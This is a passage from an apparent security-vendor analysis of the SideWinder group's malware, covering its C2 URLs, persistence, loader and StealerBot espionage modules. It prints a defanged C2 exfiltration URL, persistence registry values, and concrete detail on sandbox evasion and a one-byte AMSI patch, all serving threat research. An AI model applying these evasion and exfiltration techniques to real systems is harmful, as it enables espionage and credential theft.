!important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e32523100545-1"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo></span></div></div></td> </tr> </table> </div> </div><p> The malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet:</p> <div id="crayon-67446d0bc5e36955663099" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download C2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download C2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download C2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e36955663099-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e36955663099-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e36955663099-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e36955663099-4">4</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e36955663099-1"><span class="crayon-i">C2_URL_1</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/735e3a_download</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e36955663099-2"><span class="crayon-i">C2_URL_2</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/0df7b2_download</span></div><div class="crayon-line" id="crayon-67446d0bc5e36955663099-3"><span class="crayon-i">C2_URL_3</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/27419a_download</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e36955663099-4"><span class="crayon-i">C2_URL_4</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//dynamic.nactagovpk[.]org/ef1c4f_download</span></div></div></td> </tr> </table> </div> </div><p> The malware sends the collected information to one of the C2 servers selected according to the specific infection routine. The server response should be a payload with various configuration values.</p> <p>The set of values may vary depending on the infection routine. The malware parses the received values and assigns them to local variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular infection routine the attacker used debug strings that allowed us to obtain most of these names. The table below contains the full list of possible configuration values.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable name</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>MALWARE_DIRECTORY</td> <td>Directory path where all the malicious files are stored.</td> </tr> <tr> <td>LOAD_DLL_URL_X64</td> <td>URL used to download the malicious library for 64-bit systems.</td> </tr> <tr> <td>LOAD_DLL_URL_X86</td> <td>URL used to download the malicious library for 32-bit systems.</td> </tr> <tr> <td>LOAD_DLL_URL</td> <td>URL used to download the malicious library. Some infection routines do not check the architecture.</td> </tr> <tr> <td>APP_DLL_URL</td> <td>URL used to download the encrypted payload.</td> </tr> <tr> <td>HIJACK_EXE_URL</td> <td>URL used to download the legitimate application used to sideload the malicious library.</td> </tr> <tr> <td>RUN_KEY</td> <td>Name of the Windows Registry value that will be created to maintain persistence.</td> </tr> <tr> <td>HIJACK_EXE_NAME</td> <td>Name of the legitimate application.</td> </tr> <tr> <td>LOAD_DLL_NAME</td> <td>Name of the malicious library.</td> </tr> <tr> <td>MOD_LOAD_DLL_URL</td> <td>URL used to download an unknown library that is saved in the MALWARE_DIRECTORY as “IPHelper.dll”.</td> </tr> </tbody> </table> <p>The payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.</p> <p>During execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample used C2_URL_4 for this purpose. The request includes at least one variable named “data”, whose value indicates the infection status.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>?data=1</td> <td>Downloads completed.</td> </tr> <tr> <td>?data=2</td> <td>Persistence point created.</td> </tr> <tr> <td>?data=3&m=str</td> <td>Error. It also contains a variable “m” with information about the error.</td> </tr> <tr> <td>?data=4</td> <td>Infection completed, but the next stage is not running.</td> </tr> <tr> <td>?data=5</td> <td>Infection completed and the next stage is running.</td> </tr> </tbody> </table> <p>The technique used to maintain persistence varies according to the infection routine selected by the malware, but generally relies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.</p> <p>For example:</p> <div id="crayon-67446d0bc5e38976832854" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegValue: xcschemer (MALWARE_DIRECTORY) RegValueData: %AppData%\xcschemer\vssvc.exe (HIJACK_EXE_PATH)</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e38976832854-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e38976832854-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e38976832854-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e38976832854-1"><span class="crayon-i">RegKey</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">HKCU</span><span class="crayon-sy">\</span><span class="crayon-i">SOFTWARE</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">CurrentVersion</span><span class="crayon-sy">\</span><span class="crayon-e">Run</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e38976832854-2"><span class="crayon-i">RegValue</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-e">xcschemer</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-i">MALWARE_DIRECTORY</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-67446d0bc5e38976832854-3"><span class="crayon-i">RegValueData</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">AppData</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">xcschemer</span><span class="crayon-sy">\</span><span class="crayon-i">vssvc</span><span class="crayon-sy">.</span><span class="crayon-e">exe</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-i">HIJACK_EXE_PATH</span><span class="crayon-sy">)</span></div></div></td> </tr> </table> </div> </div><p> <h2 id="backdoor-loader-module">Backdoor loader module</h2> <p>The infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded using the legitimate and digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped by ModuleInstaller, decrypts it and loads it in memory.</p> <p>The Backdoor loader module has been observed since 2020, we covered it in our private APT reports. It has remained almost the same over the years. It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, and the latest variants were designed to enumerate all the files in the current directory and load those without an extension.</p> <p>The library is usually highly obfuscated using the <a href="https://web.archive.org/web/20150907034947/http:/www.inf.u-szeged.hu/~akiss/pub/pdf/laszlo_obfuscating.pdf" target="_blank" rel="noopener">Control Flow Flattening</a> technique. In addition, the strings, method names, and resource names are randomly modified with long strings, which makes the decoded code difficult to analyze. Moreover, some relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple DES.</p> <p>The malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100 seconds. Sandboxes usually ignore the sleeping functions because they are often used by malware to generate long delays in execution and avoid detection. Upon awakening, the malware retrieves again the current time and date and checks if the elapsed time is less than 90.5 seconds. If the condition is true, it terminates the execution.</p> <p>The malware also attempts to avoid detection by patching the AmsiScanBuffer function in “amsi.dll” (Windows Antimalware Scan Interface). Specifically, it loads the “amsi.dll” library and parses the export directory to find the “AmsiScanBuffer” function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D to always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi” protection to always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.</p> <div id="attachment_114134" style="width: 850px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114134" class="size-full wp-image-114134" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08.png" alt="AmsiScanBuffer before patching" width="840" height="243" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08.png 840w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-300x87.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-768x222.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-740x214.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151630/SideWinder_2024_08-800x231.png 800w" sizes="(max-width: 840px) 100vw, 840px" /></a><p id="caption-attachment-114134" class="wp-caption-text">AmsiScanBuffer before patching</p></div> <div id="attachment_114135" style="width: 850px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114135" class="size-full wp-image-114135" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09.png" alt="AmsiScanBuffer after patching" width="840" height="243" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09.png 840w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-300x87.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-768x222.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-740x214.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07151701/SideWinder_2024_09-800x231.png 800w" sizes="(max-width: 840px) 100vw, 840px" /></a><p id="caption-attachment-114135" class="wp-caption-text">AmsiScanBuffer after patching</p></div> <p>The patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero) instruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as input to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.</p> <p>After patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another payload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character ‘.’ in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file as the key and decodes the rest of the data using the XOR algorithm. Finally, it loads the data as a .NET assembly and invokes the “Program.ctor” method.</p> <h2 id="stealerbot">StealerBot</h2> <p>StealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module. Prior to being loaded, the binary is stored in an encrypted file.</p> <p>The implant consists of different modules loaded by the main “Orchestrator”, which is responsible for communicating with the C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded on compromised victims and were used to:</p> <ul> <li>Install additional malware;</li> <li>Capture screenshots;</li> <li>Log keystrokes;</li> <li>Steal passwords from browsers;</li> <li>Intercept RDP credentials;</li> <li>Steal files;</li> <li>Start reverse shell;</li> <li>Phish Windows credentials;</li> <li>Escalate privileges bypassing UAC.</li> </ul> <p>Module IDs are included both in modules and in an encrypted configuration file. The Orchestrator uses them to manage the components. It shares messages/commands with the modules, and can handle specific messages to kill or remove modules with a particular ID.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Module ID</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>0xca</td> <td>Keylogger</td> </tr> <tr> <td>0xcb</td> <td>Live Console</td> </tr> <tr> <td>0xd0</td> <td>Screenshot Grabber</td> </tr> <tr> <td>0xd4</td> <td>File Stealer</td> </tr> <tr> <td>0xd6</td> <td>UACBypass</td> </tr> <tr> <td>0xe0</td> <td>RDP Credential Stealer</td> </tr> <tr> <td>0xe1</td> <td>Token Grabber</td> </tr> <tr> <td>??</td> <td>Credential Phisher</td> </tr> </tbody> </table> <h3 id="stealerbot-orchestrator">StealerBot Orchestrator</h3> <p>The Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server, and executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker and upload files with stolen information. It also exchanges messages with the loaded module that can be used to provide or modify configuration properties and unload specific components from the memory.</p> <p>Once loaded into memory, the malware decodes a resource embedded in the Orchestrator called “Default”. The resource contains a configuration file with the following structure:</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Parameter</strong></td> <td width="25%"><strong>Parameter type</strong></td> <td width="50%"><strong>Description</strong></td> </tr> <tr> <td>Config path</td> <td>String</td> <td>Location used to store the configuration file after first execution</td> </tr> <tr> <td>Data directory</td> <td>String</td> <td>Directory where the plugins store the output files that will be uploaded to the remote C2</td> </tr> <tr> <td>C2 Modules</td> <td>String</td> <td>URL used to communicate with C2 server and retrieve additional plugins</td> </tr> <tr> <td>C2 Gateway</td> <td>String</td> <td>URL used to upload files generated by modules</td> </tr> <tr> <td>C2 Modules Sleeptime</td> <td>Integer</td> <td>Sleep time between communications with “C2 Modules”</td> </tr> <tr> <td>C2 Gateway Sleeptime</td> <td>Integer</td> <td>Sleep time between communications with “C2 Gateway”</td> </tr> <tr> <td>RSA_Key</td> <td>String</td> <td>RSA key used to encrypt communication with the C2 server</td> </tr> <tr> <td>Number of plugins</td> <td>Integer</td> <td>Number of plugins embedded in the configuration</td> </tr> <tr> <td>Modules</td> <td>Array</td> <td>Array which contains the modules</td> </tr> </tbody> </table> <p>The configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the malware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2 server.</p> <p>After parsing the configuration, the malware loads all the modules specified in the file. It then launches two threads to communicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed “C2 Modules”, which is used to obtain new modules. The second thread is used to communicate with the URL we called “C2 Gateway”, which is used to upload the data generated by the modules.</p> <p>The malware communicates with the C2 Modules server using GET requests. Before sending the request, it adds an “x” value that contains the list of modules already loaded by the agent.</p> <div id="crayon-67446d0bc5e3b088725839" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &x[moduleId_1,moduleId_2,moduleId_3,etc.]"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e3b088725839-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e3b088725839-1"><span class="crayon-h">&x</span><span class="crayon-sy">[</span><span class="crayon-i">moduleId_1</span><span class="crayon-sy">,</span><span class="crayon-i">moduleId_2</span><span class="crayon-sy">,</span><span class="crayon-i">moduleId_3</span><span class="crayon-sy">,</span><span class="crayon-i">etc</span><span class="crayon-sy">.</span><span class="crayon-sy">]</span>"</div></div></td> </tr> </table> </div> </div><p> The server responds with a message composed of two parts, the header and the payload. Each part has a specific structure with different information:</p> <div id="attachment_114136" style="width: 554px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09115341/SideWinder_2024-10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114136" class="size-full wp-image-114136" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09115341/SideWinder_2024-10.png" alt="Message structure" width="544" height="387" /></a><p id="caption-attachment-114136" class="wp-caption-text">Message structure</p></div> <p>Each message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in the “rgbSignature” value. The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify that the provided digital signature is valid.</p> <p>The header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is compressed using Gzip and encrypted using AES. The header contains the information needed to identify the module, decrypt the payload, and verify the received data.</p> <p>When the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a pipe handle. The pipe is used to maintain communication between the module and the Orchestrator.</p> <p>The modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and terminate module execution. The messages function like commands, have a specific ID, and can include arguments.</p> <p>The first byte of the message is its ID, which defines the request type:</p> <table width="100%"> <tbody> <tr> <td width="15%"><strong>Message ID</strong></td> <td width="85%"><strong>Description</strong></td> </tr> <tr> <td>0</td> <td><strong>Get settings:</strong> the Orchestrator creates a copy of the current configuration and sends it to the module.</td> </tr> <tr> <td>1</td> <td><strong>Update config:</strong> the module provides a new configuration and the Orchestrator updates the current configuration values and stores them in the local file.</td> </tr> <tr> <td>2</td> <td><strong>Unload current module:</strong> the Orchestrator should unload the current module from the memory and close the related pipes.</td> </tr> <tr> <td>3</td> <td><strong>Unload module by ID:</strong> the Orchestrator should unload a module with the ID specified in the received request.</td> </tr> <tr> <td>4</td> <td><strong>Remove startup:</strong> the Orchestrator should remove a module from the local configuration. The module ID is specified in the received request.</td> </tr> <tr> <td>5</td> <td><strong>Remove current module from the configuration:</strong> the Orchestrator should remove the current module ID from the local configuration.</td> </tr> <tr> <td>6</td> <td><strong>Terminate current thread: </strong>the Orchestrator stops timers, pipes and removes the current module from the current list of modules.</td> </tr> <tr> <td>7</td> <td><strong>Save log message: </strong>the Orchestrator saves a log message using the current module ID.</td> </tr> <tr> <td>8</td> <td><strong>Save log message:</strong> the Orchestrator saves a log message using the specified module ID.</td> </tr> <tr> <td>9</td> <td><strong>Get output folder configuration.</strong></td> </tr> <tr> <td>10</td> <td><strong>Get C2 Modules URL:</strong> the Orchestrator shares the current C2 Modules URL with the module.</td> </tr> <tr> <td>11</td> <td><strong>Get C2 Gateway URL:</strong> the Orchestrator shares the current C2 Gateway URL with the module.</td> </tr> <tr> <td>12</td> <td><strong>Get RSA_Key public key.</strong></td> </tr> </tbody> </table> <h3 id="modules">Modules</h3> <h4 id="keylogger">Keylogger</h4> <p>This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes, mouse events, Windows clipboard contents, and the title of the currently active window.</p> <h4 id="screenshot-grabber">Screenshot Grabber</h4> <p>This module periodically grabs screenshots of the primary screen.</p> <h4 id="file-stealer">File Stealer</h4> <p>The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions. By default, the list of extensions is as follows:</p> <div id="crayon-67446d0bc5e3e004867871" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> .ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e3e004867871-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e3e004867871-1"><span class="crayon-sy">.</span><span class="crayon-i">ppk</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">doc</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">docx</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">xls</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">xlsx</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">ppt</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">zip</span><span class="crayon-sy">,</span><span class="crayon-sy">.</span><span class="crayon-i">pdf</span></div></div></td> </tr> </table> </div> </div><p> Based on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that usually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the extension of files created by PuTTY to store private keys. PuTTY is an SSH and Telnet client commonly used on Windows OS to access remote systems.</p> <p>The stolen data also includes information about the local drive and file attributes.</p> <div id="attachment_114137" style="width: 477px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152505/SideWinder_2024_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114137" class="size-full wp-image-114137" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152505/SideWinder_2024_11.png" alt="Snippet of code with the list of information collected by the File Stealer module" width="467" height="281" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152505/SideWinder_2024_11.png 467w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152505/SideWinder_2024_11-300x181.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152505/SideWinder_2024_11-330x200.png 330w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152505/SideWinder_2024_11-465x280.png 465w" sizes="(max-width: 467px) 100vw, 467px" /></a><p id="caption-attachment-114137" class="wp-caption-text">Snippet of code with the list of information collected by the File Stealer module</p></div> <h4 id="live-console">Live Console</h4> <p>This library is configured to execute arbitrary commands on the compromised system. It can be used as a passive backdoor, listening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands. The library can also process custom commands that provide the following capabilities:</p> <ul> <li>Kill the module itself or its child processes;</li> <li>Download additional files to compromised systems;</li> <li>Add Windows Defender exclusions;</li> <li>Infect other users on the local system (requires high privileges);</li> <li>Download and execute remote HTML applications;</li> <li>Load arbitrary modules and extend malware capabilities.</li> </ul> <p>Unlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module’s code. By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.</p> <p>If the infected OS is recent, i.e., Windows 10 build version greater than or equal to “17763”, the malware creates a <a href="https://learn.microsoft.com/en-us/windows/console/pseudoconsoles" target="_blank" rel="noopener">pseudoconsole</a> to launch “cmd.exe”. Otherwise, it launches the same application using the “Process” class specified in “System.Diagnostics”.</p> <p>Before forwarding the command to the console, the malware checks if the first byte of the received data has a specific value that indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the commands they identify.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Windows build</strong></td> <td width="30%"><strong>Command ID</strong></td> <td width="40%"><strong>Description</strong></td> </tr> <tr> <td><strong> < </strong>17763</td> <td>3</td> <td>Kill all child processes</td> </tr> <tr> <td><strong> < </strong>17763</td> <td>4</td> <td>Kill the current module. Sends the message ID “2” to the Orchestrator to unload the module itself.</td> </tr> <tr> <td><strong> < </strong>17763</td> <td>16</td> <td>Upload file to the infected system</td> </tr> <tr> <td><strong>>= </strong>17763</td> <td>1</td> <td>Infect current logged-in user</td> </tr> <tr> <td><strong>>= </strong>17763</td> <td>2</td> <td>Get current logged-in user</td> </tr> <tr> <td><strong>>= </strong>17763</td> <td>3</td> <td>Download and execute a remote HTML application</td> </tr> <tr> <td><strong>>= </strong>17763</td> <td>4</td> <td>Add directories to AV exclusions</td> </tr> <tr> <td><strong>>= </strong>17763</td> <td>5</td> <td>Load a plugin</td> </tr> </tbody> </table> <p>Most of the commands are self-explanatory. We’d 